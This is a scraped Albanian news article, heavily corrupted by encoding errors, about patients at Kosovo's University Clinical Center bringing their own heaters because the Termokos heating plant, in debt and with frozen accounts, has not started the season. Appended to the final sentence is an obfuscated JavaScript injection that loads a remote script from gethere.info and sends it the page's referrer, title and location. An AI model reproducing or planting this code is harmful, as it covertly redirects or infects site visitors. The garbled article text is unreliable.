Spitali_Foto_Arbresha_628013

Termokosi ngrin QKU-nA�

atacand witout a script. Ngrohtorja e qytetit as sivjet nuk ka filluar tA� lA�shojA� ngrohjen nA� QendrA�n KlinikA� Universitare. PacientA�t janA� tA� detyruar qA� ngrohjen ta sigurojnA� nga shtA�pitA�. a�?Termokosa�? dhe QKU-ja po presin QeverinA� qA� ta��ua zgjidhA� problemet financiare.

NA� A�do dhomA� tA� QendrA�s Klinike Universitare, ku pacientA�t janA� tA� shtrirA�, ka ngrohje. Ato nuk vijnA� nga radiatorA�t e QKU-sA�, por nga nxehA�set qA� familjarA�t e pacientA�ve i kanA� sjellA� nga shtA�pitA� e tyre.

PA�r ta bA�rA� kA�tA� ata janA� detyruar pasi qA� radiatorA�t nA� repartet e QKU-sA� janA� akull, edhe pse A�shtA� dita e shtatA� e nA�ntorit.

Gjendja mA� e rA�ndA� A�shtA� nA� KlinikA�n e PediatrisA� dhe atA� tA� GjinekologjisA�. FA�mijA�t e shtrirA� nA� KlinikA�n e PediatrisA� pA�rveA� sA�mundjes, pA�rballen edhe me tA� ftohtit e nA�ntorit. PrindA�rit janA� tA� detyruar tA� dA�rgojnA� nxehA�set me rrymA� dhe batanije.

Me nxehA�sen nA� krahA� me sabah ia ka mA�syrA� QKU-sA� edhe Hajzer Krasniqi. Ky qytetar nga Malisheva e ka djalin e shtrirA� nA� KlinikA�n e PediatrisA� dhe thotA� se, duke e parA� se dhomat nA� klinikA� janA� tA� ftohta, ka marrA� nxehA�sen me vete. MirA�po, Hajzerit po i del telashe me punA�torA� tA� sigurimit. Ata nuk deshA�n ta lejojnA� tA� mA�rkurA�n tA� fusA� brenda nxehjen.

a�?Menxi i binda me mA� lanA� me shti mrena nxemjen. KA�ta hiq nuk mendojnA� pA�r shA�ndetin e pacientA�ve. Nuk muj me lanA� djalin ma��u mA�rdhi, pak qA� A�shtA� i sA�murA�a�?, thotA� Hajzeri.

Gjendje e njA�jtA� A�shtA� edhe nA� KlinikA�n Gjinekologjike, ku fA�mijA�t e sapolindur mA�rdhijnA� nga tA� ftohtit.

KA�tA� e konfirmojnA� edhe mjekA�t nA� KlinikA�n e GjinekologjisA�. a�?RadiatorA�t janA� akull, nuk e di pse nA� kA�tA� kohA� kur temperaturat kanA� rA�nA�, sidomos gjatA� ditA�s sA� sotme, nuk ka nxehje qendrorea�?, thotA� njA� mjeke nA� KlinikA�n e NeonatologjisA�.

a�? MA� sA� keqi janA� duke pA�suar fA�mijA�t e porsalindur dhe nA�nat, qA� janA� nA� gjendje jo tA� mirA� shA�ndetA�sore pas lindjesa�?, thotA� kjo mjeke.

NdA�rkohA�, ngrohtorja e qytetit a�?Termokosa�? ende nuk ka filluar sezonin e ngrohjes. Kjo, sipas zA�dhA�nA�ses AfA�rdita Uka-Fezjullahu, pA�r shkak tA� gjendjes sA� rA�ndA� financiare nA� tA� cilA�n ndodhet. a�?Jemi duke pritur ndihmA�n e QeverisA�, pA�rkatA�sisht MinistrisA� sA� Financave, qA� tA� na ndihmojA� tA� shlyejmA� borxhin e trashA�guar nga menaxhmenti i kaluar prej mbi 1 milion eurosh ndaj kontraktorit tA� mazutit. NA� pamundA�si pA�r tA� paguar kA�tA� borxh, pas padisA� qA� a�?Compact Groupa�� ka bA�rA� nA� gjykatA�, a�?Termokosita�� i janA� bllokuar tA� gjitha kontot bankarea�?, tha Uka-Fejzullahu pA�r Express.

Sipas saj, a�?Termokosia�? teknikisht A�shtA� i gatshA�m pA�r tA� filluar sezonin ngrohA�s.

ZA�dhA�nA�sja e ngrohtores tha se janA� siguruar edhe sasitA� e para tA� mazutit pA�r fillimin e prodhimit tA� ngrohjes, por si pasojA� e problemeve financiare, nA� pamundA�si pA�r tA� siguruar sasitA� e nevojshme pA�r gjithA� sezonin ngrohA�s, sasitA� e deponuara tanimA� nA� rezervuarA�t e a�?Termokosita�? janA� duke u ruajtur pA�r ditA�t kur do tA� ketA� temperatura mA� tA� ulA�ta.

a�?Si pasojA� e kA�tyre problemeve, as pA�r QKU-nA� sikur as pA�r afro 12 mijA� e 500 konsumatorA� a�?Termokosa�� ende nuk ka filluar tA� prodhojA� ngrohje. ShpresojmA� qA� kjo situatA� tA� pA�rfundojA� sa mA� parA� dhe pa vonuar do tA� na ofrohet ndihma e kA�rkuar nga Qeveria pA�r zhbllokimin e kontove bankare, nA� mA�nyrA� qA� tA� fillojmA� sezonin ngrohA�sa�?, tha Uka-Fejzullahu.

PA�rndryshe, sipas saj, ende A�shtA� nA� fuqi marrA�veshja e arritur nA� mes menaxhmentit tA� a�?Termokosita�? dhe QKU-sA�, qA� nA� rastet kur a�?Termokosa�? nuk do tA� arrijA� tA� prodhojA� ngrohje me kaldajat, pA�r nevojat e QKUK-sA� tA� funksionalizohet ngrohtorja afA�r hapA�sirave tA� kA�saj qendre mjekA�sore.

a�?Si rezultat i kA�saj marrA�veshjeje, a�?Termokosa�� do tA� ofrojA� stafin e vet pA�r prodhimin e energjisA� ngrohA�se nga kjo ngrohtore, ndA�rsa QKU-sA� i takon tA� sigurojA� lA�ndA�n djegA�se-naftA�na�?, tha Uka – Fejzullahu.

NA� anA�n tjetA�r, edhe zA�dhA�nA�si i QKU-sA�, Shpend Fazliu, tha se nA� rast tA� mosfurnizimit nga ana e “Termokos”, e vetmja mundA�si pA�r furnizim me ngrohje pA�r QKU-nA� A�shtA� furnizimi nga ngrohtorja alternative me naftA�. Kjo, sipas Fazliut, A�shtA� nA� pronA�si tA� “Termokos” dhe ngroh me derivate tA� naftA�s, por qA� A�shtA� shumA� e kushtueshme dhe vA�shtirA� e pA�rballueshme pA�r buxhetin e QKUK-sA�.

a�?Brenda dite harxhojmA� 5 tonA� naftA�, qA� i bie tA� kemi mbi 6 mijA� euro shpenzime brenda njA� dite. Vitin e kaluar kemi pasur shpenzime mbi 600 mijA� euro dhe nuk na janA� alokuar mjete shtesA� pA�rkundA�r premtimevea�?, tha Fazliu.

Ai shpreson se kA�tA� vit QKU-ja do tA� mbA�shtetet nga institucionet e vendit, Ministria e ShA�ndetA�sisA� dhe Qeveria e KosovA�s me buxhet shtesA�, meqA� QKU duhet tA� siguroj ngrohje pA�r pacientA�t. Derisa QKU-ja dhe Termokosi ta��i sigurojnA� paratA� nga buxheti i shtetit, pacientA�ve nuk u mbetet asgjA� tjetA�r veA�se tA� sigurojnA� ngrohjen nga shtA�pitA� e tyre. E vetmja alternativA� mbeten nxehA�set me rrymA� dhe batanijet e trasha.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}